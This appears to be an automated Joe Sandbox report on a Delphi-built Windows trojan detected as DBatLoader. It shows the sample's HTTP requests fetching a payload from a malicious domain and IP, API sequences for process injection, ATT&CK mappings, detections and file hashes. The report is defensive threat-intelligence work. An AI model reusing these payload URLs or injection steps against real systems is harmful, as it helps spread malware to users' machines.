Source: r096teIe1H.exe, 00000000.00000002.761124964.000000000063F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl~
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkp2
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/ll
Source: r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com

Source: unknown

DNS traffic detected: queries for: balkancelikdovme.com

Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com

Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_95373646-5

Source: r096teIe1H.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: r096teIe1H.exe	Binary or memory string: OriginalFilename vs r096teIe1H.exe
Source: r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe
Source: r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe

Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032620C4

0_2_032620C4

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: String function: 03264698 appears 78 times
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: String function: 03264824 appears 325 times

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_0327D8B0 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,

0_2_0327D8B0

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03277B88 GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,	0_2_03277B88
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327CBE8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0327CBE8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327D8B0 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,	0_2_0327D8B0
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327A6F4 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,	0_2_0327A6F4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327CB04 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0327CB04
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03277B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_03277B14
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327CA74 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0327CA74
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03277F54 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	0_2_03277F54
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327CFB0 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,	0_2_0327CFB0

Source: r096teIe1H.exe	ReversingLabs: Detection: 57%
Source: r096teIe1H.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\r096teIe1H.exe

File read: C:\Users\user\Desktop\r096teIe1H.exe

Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal96.troj.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_03276DC0 CoCreateInstance,

0_2_03276DC0

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_03267FB6 GetDiskFreeSpaceA,

0_2_03267FB6

Source: C:\Users\user\Desktop\r096teIe1H.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: r096teIe1H.exe

Static file information: File size 1053184 > 1048576

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: r096teIe1H.exe, type: SAMPLE
Source: Yara match	File source: 0.2.r096teIe1H.exe.220056c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.r096teIe1H.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.r096teIe1H.exe.3260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.r096teIe1H.exe.220056c.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03266374 push 032663CFh; ret	0_2_032663C7
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03266372 push 032663CFh; ret	0_2_032663C7
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032632F0 push eax; ret	0_2_0326332C
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032882F4 push 0328835Fh; ret	0_2_03288357
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0328C10C push eax; ret	0_2_0328C1DC
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03288144 push 032881ECh; ret	0_2_032881E4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032881F8 push 03288288h; ret	0_2_03288280
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03273050 push 0327309Dh; ret	0_2_03273095
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032880AC push 03288125h; ret	0_2_0328811D
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327A08C push 0327A0C4h; ret	0_2_0327A0BC
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03266766 push 032667AAh; ret	0_2_032667A2
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03266768 push 032667AAh; ret	0_2_032667A2
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03287508 push 03287720h; ret	0_2_03287718
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0326C550 push ecx; mov dword ptr [esp], edx	0_2_0326C555
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0326D584 push 0326D5B0h; ret	0_2_0326D5A8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327D4EC push ecx; mov dword ptr [esp], edx	0_2_0327D4F1
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0326CBD0 push 0326CD56h; ret	0_2_0326CD4E
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03277904 push 03277981h; ret	0_2_03277979
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03276940 push 032769EBh; ret	0_2_032769E3
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_0327C95C push 0327C994h; ret	0_2_0327C98C
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_03272F44 push 03272FBAh; ret	0_2_03272FB2

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_03277B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_03277B14

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_0327A0C8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0327A0C8

Source: C:\Users\user\Desktop\r096teIe1H.exe TID: 7044	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe TID: 7044	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_032658CC

Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH4c%SystemRoot%\system32\mswsock.dll
Source: r096teIe1H.exe, 00000000.00000002.761124964.000000000063F000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761124964.000000000062D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_03277B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_03277B14

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_03265A90
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetLocaleInfoA,	0_2_0326A7A8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetLocaleInfoA,	0_2_0326A7F4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_03265B9C

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_0326B770 GetVersionExA,

0_2_0326B770

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032691F0 GetLocalTime,

0_2_032691F0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
r096teIe1H.exe	58%	ReversingLabs	Win32.Trojan.Leonem
r096teIe1H.exe	57%	Virustotal		Browse
r096teIe1H.exe	100%	Avira	TR/Redcap.zvjcd
r096teIe1H.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
balkancelikdovme.com	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://://t.exet.exe	0%	Avira URL Cloud	safe
http://balkancelikdovme.com/LL	100%	Avira URL Cloud	malware
http://balkancelikdovme.com/	18%	Virustotal		Browse
http://balkancelikdovme.com/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
balkancelikdovme.com	185.181.116.217	true	true	18%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://://t.exet.exe	r096teIe1H.exe, 00000000.00000002.761075893.000000000019B000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://balkancelikdovme.com/	r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000003.492188060.0000000000653000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.pmail.com	r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmp	false		high
http://balkancelikdovme.com/LL	r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://balkancelikdovme.com/ll	r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.181.116.217	balkancelikdovme.com	United Kingdom		29017	GYRONGB	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1296092
Start date and time:	2023-08-23 20:14:35 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	r096teIe1H.exe
Original Sample Name:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
Detection:	MAL
Classification:	mal96.troj.winEXE@1/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.6% (good quality ratio 27.9%) Quality average: 78.2% Quality standard deviation: 22.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 21 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.181.116.217	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
balkancelikdovme.com	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse	185.181.116.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GYRONGB	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse	185.181.116.217
	CX17SY6xF6.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	PIyT9A3jfC.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	nhVJ8J5qOt.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	fs7AQcREFX.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	https://farma-net.com/admin/auth?userid=rob.mayberry@gelita.com	Get hash	malicious	HTMLPhisher	Browse	89.145.93.101
	IrJyqwDp6P.elf	Get hash	malicious	Mirai, Moobot	Browse	83.223.101.7
	6gjnnBAbpc.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	83.223.101.9
	iJzpyjAehB.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	EksRd2mRLH.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46
	rLDmqbpt5D.exe	Get hash	malicious	Pushdo, DanaBot, RedLine, SmokeLoader	Browse	83.223.113.46
	irLUxBeO3j.elf	Get hash	malicious	Mirai	Browse	212.113.144.7
	d4bNCWDk1F.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46
	https://s3.amazonaws.com/appforest_uf/f1673569031431x837044964462498200/index.xhtml?17373464282007070576159867576718836072896596236213191414781774633016138409263067560810655664611593768691127511520387902715816470054901430985217113983744921341215241681383688426527535794966000143072299496022028714025186539246245021092115024781420437166872573917715270671544911886953886795996849529998276450=!!ERROR%20IN%20FUNCTION%20PARAMETERS!!%20'boyd.eastman@imail.org'%20ist%20kein%20g%C3%BCltiger%20Integerwert&1765620972=Ym95ZC5lYXN0bWFuQGltYWlsLm9yZw==&1/16/202318961133127049864077866167768198212901460441750214020786111898549251534145544273852461499171043240208500698254918200574448252831614537487276212299050019524818481725182239195411702340331216281502686321309755971688813861&email=boyd.eastman@imail.org&2048532416162595706016219186831446773579524518014200612466611761644571231872529944108636910539217157238248758958712136946159490521927112180269811067101566160108479243853193319321023555707545963759105821172180882197934179314148125212682089161392996891286741775134210235114693034421458487518136059350121079991895186634721265116660=138892235	Get hash	malicious	HTMLPhisher	Browse	83.223.113.113
	1EsDtA4mep.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.349529449609779
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	r096teIe1H.exe
File size:	1'053'184 bytes
MD5:	b1e794e29881f56a4e9afa213d7c622d
SHA1:	7f5991e1e24a29eff5fad62b33e05fcff2eb0988
SHA256:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
SHA512:	bd9c2dd293c9d0282dcd1d53edc3919ce2d92fe43f451cc014324ce21c7f0fa14ee59099342adfb11e742eb7e7937f5eddef6ecc43bac129e42a62126de90276
SSDEEP:	24576:p9PSlSUTC5lG8Zj4BQG/AWgbPmEqE5pgixE7p:p9PUZT27j4aGoTlnpg
TLSH:	5C25C022B1A88473F1E71E34F98E6394981F7D211F74788366D27D8EBA76541B62C383
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	71f9919286b2a1a5

Static PE Info

General

Entrypoint:	0x460464
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
